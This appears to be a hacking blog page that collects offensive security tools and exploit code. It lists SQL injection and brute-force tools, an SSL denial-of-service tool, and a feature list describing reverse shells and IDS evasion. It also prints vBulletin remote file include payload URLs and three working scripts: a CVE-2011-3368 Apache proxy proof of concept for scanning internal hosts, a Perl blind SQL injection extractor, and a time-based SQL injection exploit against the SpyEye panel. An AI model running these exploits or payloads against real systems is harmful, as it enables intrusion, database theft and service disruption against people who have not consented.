Joomscan Security Scanner Updated
Joomscan Security Scanner updated recently with new database have 550 vulnerabilities. Detects file inclusion, sql injection, command execution vulnerabilities of a target Joomla web site. Last update for this tool was in August, 2009 with 466 vulnerabilities.
In joomscan you can check for new updates with command:
./joomscan.pl check or ./joomscan.pl update.
Download for Windows (141 KB)
Download for Linux (150 KB)
pythonsqldumper
This is a open source SQL dumper written in python.
Features:
- Databases support : MySQL
- Injection methods : INBAND, BLIND
- Injection in all parameters sent to server GET, POST, HEADERS (Cookie, User-Agent,...)
- Custom headers
- Supports mod_rewrite injection
- Supports injection in parameters encoded in base64 algoritm
- Supports proxy (HTTP, SOCKET4, SOCKET5)
- Supports injection in HTTPS throw proxy (only socket)
- Supports custom user query injection
- Save all extracted data to a dump file
- Dumps only structure of database
- Increases delay between two consecutive failed requests (allow the server to chill down)
- Delay between requests
Bugs and suggestions at : tdx_ev@yahoo.com. Download here. Project here
Sqlninja 0.2.6 available – Download
Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end.
Its main goal is to provide a remote access on the vulnerable DB server, even in a very hostile environment. It should be used by penetration testers to help and automate the process of taking over a DB Server when a SQL Injection vulnerability has been discovered.
In order to use sqlninja, the following Perl modules need to be present:
* NetPacket
* Net-Pcap
* Net-DNS
* Net-RawIP
* IO-Socket-SSL
Features
* Fingerprint of the remote SQL Server (version, user performing the queries, user privileges, xp_cmdshell availability, DB authentication mode)
* Bruteforce of 'sa' password (in 2 flavors: dictionary-based and incremental)
* Privilege escalation to sysadmin group if 'sa' password has been found
* Creation of a custom xp_cmdshell if the original one has been removed
* Upload of netcat (or any other executable) using only normal HTTP requests (no FTP/TFTP needed)
* TCP/UDP portscan from the target SQL Server to the attacking machine, in order to find a port that is allowed by the firewall of the target network and use it for a reverse shell
* Direct and reverse bindshell, both TCP and UDP
* ICMP-tunneled shell, when no TCP/UDP ports are available for a direct/reverse shell but the DB can ping your box
* DNS-tunneled pseudo-shell, when no TCP/UDP ports are available for a direct/reverse shell, but the DB server can resolve external hostnames (check the documentation for details about how this works)
* Evasion techniques to confuse a few IDS/IPS/WAF
* Integration with Metasploit3, to obtain a graphical access to the remote DB server through a VNC server injection
* Integration with churrasco.exe, to escalate privileges to SYSTEM on w2k3 via token kidnapping
* Support for CVE-2010-0232, to escalate the privileges of sqlservr.exe to SYSTEM
Download here
ThcSslDOS
Description
THC has released a DOS tool that exploits SSL renegotiation to perform a denial of service on a given SSL server. It uses renegotiation to constantly trigger new SSL handshakes with the server, using one single TCP connection. See http://www.thc.org/thc-ssl-dos/ . For more information about renegotiation, see InsecureRenegotiation.
Detection
The current version of THC's SSL DOS tool requires the server to honor client-initiated renegotiations in order to work.
[cc lang="bash"]$ python sslyze.py --reneg www.server.com:443 [/cc]
Recommendation
A mitigation against the current version of THC's SSL DOS tool is to prevent the server from honoring client-initiated renegotiations. However, as explained on their website, "The tool can be modified to work without SSL-RENEGOTIATION by just establishing a new TCP connection for every new handshake".
Download here
xSQLScanner 1.2 MS-SQL and My-SQL servers audit tool
Vulnerability Audit options;
- Test for weak password fast;
- Test for wear/user passwords;
- Wordlist option;
- Userlist option;
Portscanner
Range IP Address audit and more.
Now the good news, i made 2 versions. Windows & Linux. The linux version use the Mono Project, so i compiled mono version to run under Linux (BackTrack 5 - GNOME).
Here the instructions to install under linux:
[cc lang="html"]1 - get http://www.4shared.com/file/ykeEX3TV/xsqlscan-mono.html
2 - tar -xzvf xsqlscan.tar.gz
3 - cd xsqlscan
4 - ./xsqlscanw
5 - The program will verify if you have Mono Core files. If you already have it, the application will launch
5.1 - If the Mono Core Files are not installed, Answer 'yes' to download the libs and mono core files
6 - Restart the application typing: ./xsqlscanw
7 - Enjoy[/cc]
Windows version: http://www.4shared.com/file/9evD9RTY/xsqlscanner-12.html
xTSCrack 0.6 Released
New release of xTSCrack can found here.
+ Supported clients: Windows 2000, XP, Vista, 2003 and 7
+ Supported servers: Windows 2000, Windows XP, Windows 2003 and Windows 2008
+ Port field added;
+ Stop bug fixed.
Now you can audit rdp servers running on different port.
vBulletin Multiple Remote File Include Vulnerabilities
vBulletin is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities to obtain potentially sensitive information or to execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
vBulletin 4.1.7 is vulnerable; other versions may also be affected.
[cc lang="html"]http://www.example.com/vB1/api.php?api_script=[RFI]
http://www.example.com/vB1/payment_gateway.php?api[classname]=[RFI]
http://www.example.com/vB1/admincp/cronadmin.php?nextitem[filename]=[RFI]
http://www.example.com/vB1/admincp/diagnostic.php?match[0]=[RFI]
http://www.example.com/vB1/admincp/diagnostic.php?api[classname]=[RFI]
http://www.example.com/vB1/admincp/plugin.php?safeid=[RFI]
http://www.example.com/vB1/includes/class_block.php?file=[RFI]
http://www.example.com/vB1/includes/class_humanverify.php?chosenlib=[RFI]
http://www.example.com/vB1/includes/class_paid_subscription.php?methodinfo[classname]=[RFI]
http://www.example.com/vB1/includes/functions.php?classfile=[RFI]
http://www.example.com/vB1/includes/functions_cron.php?nextitem[filename]=[RFI]
http://www.example.com/vB1/vb/vb.php?filename=[RFI]
http://www.example.com/vB1/install/includes/class_upgrade.php?chosenlib=[RFI]
http://www.example.com/vB1/packages/vbattach/attach.php?package=[RFI]
http://www.example.com/vB1/packages/vbattach/attach.php?path=[RFI] [/cc]
Apache mod_proxy Proof Of Concept
[cc lang="python"]#!/usr/bin/env python
import socket
import string
import getopt, sys
known_ports = [0,21,22,23,25,53,69,80,110,137,139,443,445,3306,3389,5432,5900,8080]
def send_request(url, apache_target, apache_port, internal_target, internal_port, resource):
get = "GET " + url + "@" + internal_target + ":" + internal_port + "/" + resource + " HTTP/1.1\r\n"
get = get + "Host: " + apache_target + "\r\n\r\n"
remoteserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
remoteserver.settimeout(3)
try:
remoteserver.connect((apache_target, int(apache_port)))
remoteserver.send(get)
return remoteserver.recv(4096)
except:
return ""
def get_banner(result):
return result[string.find(result, "\r\n\r\n")+4:]
def scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource):
print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource)
for port in tested_ports:
port = str(port)
result = send_request(url, apache_target, apache_port, internal_target, port, resource)
if string.find(result,"HTTP/1.1 200")!=-1 or \
string.find(result,"HTTP/1.1 30")!=-1 or \
string.find(result,"HTTP/1.1 502")!=-1:
print "- Open port: " + port + "/TCP"
print get_banner(result)
elif len(result)==0:
print "- Filtered port: " + port + "/TCP"
else:
print "- Closed port: " + port + "/TCP"
def usage():
print
print "CVE-2011-3368 proof of concept by Rodrigo Marcos"
print "http://www.secforce.co.uk"
print
print "usage():"
print "python apache_scan.py [options]"
print
print " [options]"
print " -r: Remote Apache host"
print " -p: Remote Apache port (default is 80)"
print " -u: URL on the remote web server (default is /)"
print " -d: Host in the DMZ (default is 127.0.0.1)"
print " -e: Port in the DMZ (enables 'single port scan')"
print " -g: GET request to the host in the DMZ (default is /)"
print " -h: Help page"
print
print "examples:"
print " - Port scan of the remote host"
print " python apache_scan.py -r www.example.com -u /images/test.gif"
print " - Port scan of a host in the DMZ"
print " python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local"
print " - Retrieve a resource from a host in the DMZ"
print " python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local -e 80 -g /accounts/index.html"
print
def print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource):
print
print "CVE-2011-3368 proof of concept by Rodrigo Marcos"
print "http://www.secforce.co.uk"
print
print " [+] Target: " + apache_target
print " [+] Target port: " + apache_port
print " [+] Internal host: " + internal_target
print " [+] Tested ports: " + str(tested_ports)
print " [+] Internal resource: " + resource
print
def main():
global apache_target
global apache_port
global url
global internal_target
global internal_port
global resource
try:
opts, args = getopt.getopt(sys.argv[1:], "u:r:p:d:e:g:h", ["help"])
except getopt.GetoptError:
usage()
sys.exit(2)
try:
for o, a in opts:
if o in ("-h", "--help"):
usage()
sys.exit(2)
if o == "-u":
url=a
if o == "-r":
apache_target=a
if o == "-p":
apache_port=a
if o == "-d":
internal_target = a
if o == "-e":
internal_port=a
if o == "-g":
resource=a
except getopt.GetoptError:
usage()
sys.exit(2)
if apache_target == "":
usage()
sys.exit(2)
url = "/"
apache_target = ""
apache_port = "80"
internal_target = "127.0.0.1"
internal_port = ""
resource = "/"
main()
if internal_port!="":
tested_ports = [internal_port]
else:
tested_ports = known_ports
scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource)
[/cc]
Blind Sql Injection By Inj3ct0r Team
[cc lang="perl"]#!/usr/bin/perl
use LWP::Simple;
use Time::HiRes qw(gettimeofday);
###############################################################
$string='';
$limit=0;
#string variable###############################################
# if the string that you want to use is not writable #
# on the shell you can write in this variable and #
# whene the script order from you the variable just #
# press enter. #
###############################################################
#limit variable##############################################
# if you want a particular column just change this #
# variable. #
#############################################################
@ascii_sym = (32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,58,59,60,61,62,63,64,91,92,93,94,95,96,123,124,125,126);
$glob_stat;
print "\n\t===============================================*\n";
print "\t* Blind Sql Injection Tool *\n";
print "\t* Coded By Angel Injection *\n";
print "\t* Member From Inj3ct0r Team *\n";
print "\t* Thanks To:r0073r,Sid3^effects,r4dc0re,CrosS, *\n";
print "\t===============================================*\n\n";
print "Stage 1:Checking if the target is vulnerable\n\n";
print "You should now enter the infected url\n";
print "Example :http://www.localhost/index.php?id=1\n\n";
print "URL: ";
my $url =
chomp($url);
$now = time_mili();
my $yes = get("$url+and+1=1");
$later = time_mili();
$exect = $later - $now;
$exect = sprintf("%.2f", $exect);
my $no = get("$url+and+1=0");
def($yes,$no);
print "Stage 2 :[*] Checking For A String That Can lead To exploit The Target[*]\n\n";
print " You should now enter a string(from shell or source code)\n";
print " and wait to see if is a good one. Your string must be \n";
print " related to the target\n\n";
print " The string must exist on the true page or the false page \n";
print " but not on both of them.\n";
print " A file has been created under the name string.txt it may help\n";
print " you to choose your string\n\n";
if($string eq ''){
print "String: ";
$string =
chomp($string);
while(strc($yes,$no)!=1){
print "String: ";
$string =
chomp($string);
}
}
else{
if(strc($yes,$no)!=1){
print "Please Choose another one\n: ";
exit;
}
}
chomp($string);
print "\n => Nice choice\n\n";
print "Stage 3 :[*] Extracting Information From Database[*]\n\n";
print " You should now enter The Table name\n";
print " and number of Columns to be extracted\n";
print " and their names and condition on this columns\n";
print " if you want it\n\n";
print "Table Name : ";
my $tbname =
chomp($tbname);
print "Columns Number : ";
my $num =
chomp($num);
if($num =~ /^[+-]?\d+$/){
chomp($num);
}
else{
while($num !~ /^[+-]?\d+$/){
print "Columns Number : ";
$num =
chomp($num);
}
}
chomp($num);
my @column,@trcolmun,@numtr,@result;
for(my $q=0;$q<$num;$q++){
print "Columns Name : ";
$column[$q] =
chomp($column[$q]);
}
print "\n Do You have any condition on your information\n";
print " Exemple: where id=1\n\n";
print "(yes/no): ";
my $condt =
chomp($condt);
if($condt eq 'yes'){
print "\nEnter Condition: ";
$condition=
chomp($condition);
}
print "\nStage 3-1 :[*] Checking table and columns[*]\n\n";
print " Nothing That You Can do it now\n";
print " just let the script do his job\n\n";
my $pr=chvar("$url+and+(SELECT 1 from $tbname limit 0,1)=1");
if($pr==1){
print " => Table Existe\n";
}
else{
print " => Table Dosn't Existe";
exit;
}
my $j=0;
for(my $q=0;$q<$num;$q++){
$pr = chvar("$url+and+(SELECT substring(concat(1,$column[$q]),1,1) from $tbname limit 0,1)=1");
if($pr==1){
$trcolumn[$j] = $column[$q];
print " => Column $column[$q] Existe\n";
$j++;
}
else{
print " => Column $column[$q] Dosn't Existe\n";
}
}
$trco = @trcolumn;
if($trco==0){
print "\n => No Columns Found\n";
exit;
}
print "\nStage 3-2 :[*] Extracting Columns length[*]\n\n";
print " The Script is going now to get each\n";
print " columns length\n";
print "\nCounting length of Columns...\n\n";
for(my $q=0;$q<$j;$q++){
my $qj=0;
my $ii=1;
while($qj==0){
$pr = chvar("$url+and+ascii(substring((select concat($trcolumn[$q],0x3a,0x3a)+from+$tbname $condition limit+$limit,1),$ii,1))=58");
if($pr==1){
$ii++;
$pr = chvar("$url+and+ascii(substring((select concat($trcolumn[$q],0x3a,0x3a)+from+$tbname $condition limit+$limit,1),$ii,1))=58");
if($pr==1){
$qj=1;
}
else{
$ii--
}
}
$ii++;
}
$ii -=3;
$numtr[$q]=$ii;
print " => $trcolumn[$q] : $ii\n";
}
for(my $rul=0;$rul<$trco;$rul++){
$result[$rul]='';
}
$gtf=0;
($second, $minute, $hour) = localtime();
print "\nExtracting information ...\n\n";
print "Guessing time for each column(in seconds)\n\n";
for(my $idn=0;$idn<$trco;$idn++){
$max = $numtr[$idn] * $exect * 8;
$max=sprintf("%.2f", $max);
$gtf+=$max;
print " #=> $trcolumn[$idn] max time of extraction = $max\n";
}
print "\nStart at $hour:$minute:$second (expected time to finish (in seconds) : $gtf)\n\n";
$now1 = time_mili();
for(my $bn=0;$bn<$trco;$bn++){
$nowt = time_mili();
for(my $bnum=1;$bnum<=$numtr[$bn];$bnum++){
my $ascii=opt("$url+and+ascii(substring((select concat($trcolumn[$bn],0x3a)+from+$tbname $condition limit+$limit,1),$bnum,1))");
$result[$bn].=pack("c",$ascii);
}
$latert = time_mili();
$realt = $latert - $nowt;
$realt=sprintf("%.2f", $realt);
print " => $trcolumn[$bn] = [$result[$bn]] (real time = $realt)\n";
}
$later1 = time_mili();
$exect1 = $later1 - $now1;
$exect1 = sprintf("%.2f", $exect1);
($second, $minute, $hour) = localtime() ;
print "\nFinish at $hour:$minute:$second (elapsed time (in seconds) : $exect1) \n\n";
sub opt{
my $url=$_[0];
my $isnum = $url;
my $sym_st;
$isnum .= ">57";
my $isalpha = $url;
$isalpha .= ">96";
my $isAlpha = $url;
$isAlpha .= ">65";
my $rt='';
my $brp = chvar($isnum);
if($brp==1){
my $brp1 = chvar($isalpha);
if($brp1==1){
$rt = brute_alpha($url,97,103,110,115,122);
$sym_st=3;
}
else{
$rt = brute_alpha($url,65,71,78,83,90);
$sym_st=2;
}
}
else{
$rt = brute_num($url);
$sym_st=1;
}
if(ord($rt) == 0){
$rt = opt_sym($url,$sym_st);
}
return $rt;
}
sub opt_sym(){
my $url = $_[0];
my $rt='';
if($_[1]==1){
my $ft = $url;
$ft .= ">40";
my $rft = chvar($ft);
if($rft==1){
$rt = brute_sym($url,8,15);
}
else{
$rt = brute_sym($url,0,7);
}
}
else{
if($_[1]==2){
$rt=brute_sym($url,16,22);
}
else{
$rt=brute_sym($url,23,32);
}
}
return $rt;
}
sub reduse{
for(my $i=$_[0];$i<=$_[1];$i++){
my $tmp = $_[2];
$tmp .="=$i";
my $qq = chvar($tmp);
if($qq==1){
return $i;
last;
}
}
}
sub brute_sym(){
my $ek;
for(my $i=$_[1];$i<=$_[2];$i++){
my $tmp = $_[0];
$tmp .="=$ascii_sym[$i]";
my $qq = chvar($tmp);
if($qq==1){
$ek=$i;
last;
}
}
return $ascii_sym[$ek];
}
sub brute_num(){
my $url = $_[0];
my $ft = $url;
my $rt='';
$ft .= ">52";
my $mrp = chvar($ft);
if($mrp==1){
$rt = reduse(53,57,$url);
}
else{
$rt = reduse(48,52,$url);
}
return $rt;
}
sub brute_alpha(){
my $url = $_[0];
my $ft = $url;
my $sd = $url;
my $td = $url;
my $rt ='';
$ft .= ">$_[2]";
$sd .= ">$_[3]";
$td .= ">$_[4]";
my $mrp = chvar($ft);
if($mrp==1){
my $mrp1 = chvar($sd);
if($mrp1==1){
my $mrp2=chvar($td);
if($mrp2==1){
$rt = reduse(($_[4]+1),$_[5],$url);
}
else{
$rt = reduse(($_[3]+1),$_[4],$url);
}
}
else{
$rt = reduse(($_[2]+1),$_[3],$url);
}
}
else{
$rt = reduse($_[1],$_[2],$url);
}
return $rt;
}
sub strc{
my $tmp=0;
if(($_[0] =~ /$string/) && ($_[1] !~ /$string/)){
$glob_stat=1;
return 1;
}
elsif(($_[1] =~ /$string/) && ($_[0] !~ /$string/)){
$glob_stat=0;
return 1;
}
elsif(($_[1] =~ /$string/) && ($_[0] =~ /$string/)){
return 0;
}
}
sub def{
my @fi = split(//,$_[0]);
my @sd = split(//,$_[1]);
my $rt='';
my $cn = @fi;
my $cn1 = @sd;
my $k;
($cn>$cn1) ? $k=$cn : $k=$cn1;
my $i,$j=0;
for($i=0;$i<$k;$i++){
if($fi[$i] ne $sd[$i]){
$rt.=$fi[$i];
$j++;
}
}
if(($j>5) && ($j<($i-300))){
print "\n => Target Maybe Vulnerable\n\n";
open(MYFILE,'>string.txt');
print MYFILE $rt;
close(MYFILE);
}
else{
print "\n => Target Not Vulnerable\n\n";
exit;
}
}
sub chvar{
my $url=$_[0];
my $tmp = get($url);
if($tmp=~/$string/){
if($glob_stat==1){
return 1;
}
elsif($glob_stat==0){
return 0;
}
}
elsif($tmp!~/$string/){
if($glob_stat==1){
return 0;
}
elsif($glob_stat==0){
return 1;
}
}
}
sub time_mili(){
my $s,$m,$r;
($s,$m) = gettimeofday();
$r = "$s.$m";
$r +=0;
my $rt = sprintf("%.3f", $r);
$rt +=0;
return $rt;
}[/cc]
SpyEye Blind SQL injection
[cc lang="python"]#!/usr/bin/python
from httplib import HTTPConnection
from time import time
from sys import exit, argv, stdout
import urllib
print """
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 __ __ __ __ 1
1 /'__`\ /'__`\/\ \__ /'__`\ 0
0 _ __ /\ \/\ \/\ \/\ \ \ ,_\ __ __ __/\ \/\ \ _ __ ___ ___ 1
1 /\`'__\ \ \ \ \ \ \ \ \ \ \/ /\ \/\ \/\ \ \ \ \ \/\`'__\/' __` __`\ 0
0 \ \ \/ \ \ \_\ \ \ \_\ \ \ \_\ \ \_/ \_/ \ \ \_\ \ \ \/ /\ \/\ \/\ \ 1
1 \ \_\ \ \____/\ \____/\ \__\\ \___x___/'\ \____/\ \_\ \ \_\ \_\ \_\ 0
0 \/_/ \/___/ \/___/ \/__/ \/__//__/ \/___/ \/_/ \/_/\/_/\/_/ 1
1 0
0 1
1 >> SpyEye r0073r xpl01t 0
0 >> author : Sanjar Satsura 1
1 >> sanjar[at]xakep[dot]ru 0
0 >> Public v.0.1 1
1 >> )c( 2011 0
0 1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-0
Example:
Spyeye_r0073r
"""
if len(argv)<=3: exit()
else: print "[+]Started pwn..."
host = argv[1]
path = argv[2]
sql = argv[3]
port = 80
hash = ""
full = []
for k in range(48,122):
full.append(k)
full.append(0)
# full value [48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 0]
# This is the charset to try
delay = 0.5
a=1
while a <= 32:
for i in full:
j = 0
if i == 0: exit('\n[+]Finished\n')
#
start = time()
# start time for the delay
conn = HTTPConnection(host,port)
#values = { "id" : "1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((4.0.5),a,1)),0)="K"),BENCHMARK(9000000,SHA1(1)),1));-- /*" }
values = { "id" : "1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((" + sql + ")," + str(j) + ",1)),0)=" + str(i) + "),BENCHMARK(9000000,SHA1(1)),1));-- /*" }
data = urllib.urlencode(values)
print data
conn.request("GET", path + "frm_cards_edit.php?" + data )
response = conn.getresponse()
read = response.read()
print read
if response.status == 404: exit('[+]404')
#404
now = time()
if now - start > delay:
#has come true then the character is valid
stdout.write(chr(i))
stdout.flush()
hash += chr(i)
a += 1
break;
else: j += 1
print "i vale %s, y J vale %s" %(i,j)
# w4tch u. h4ck u. fuck u. 1337day
# www.r00tw0rm.com[/cc]
Disclaimer
Categories
- android (1)
- antivirus (1)
- backup (1)
- backup exec (2)
- bruteforce (6)
- conference (2)
- CRSF (2)
- DirectAdmin (1)
- DoS (11)
- enumeration (2)
- Fără categorie (2)
- flash (2)
- Fuzzer (2)
- games (1)
- hacking (116)
- how-to (32)
- Information gathering (2)
- lfi (3)
- linux (27)
- mobile (1)
- ms exchange (2)
- News (2)
- Phishing (1)
- php (1)
- rdp (1)
- rfi (5)
- rootkit (1)
- scripts (33)
- seo (1)
- sniff (3)
- social engineering (2)
- source code (33)
- sqli (16)
- ssh (2)
- symantec (3)
- tools (73)
- tutorials (20)
- tutorials (1)
- Uncategorized (7)
- vranger (1)
- windows (12)
- wireless (1)
- wsus (1)
- xpath (1)
- xsrf (1)
- xss (12)
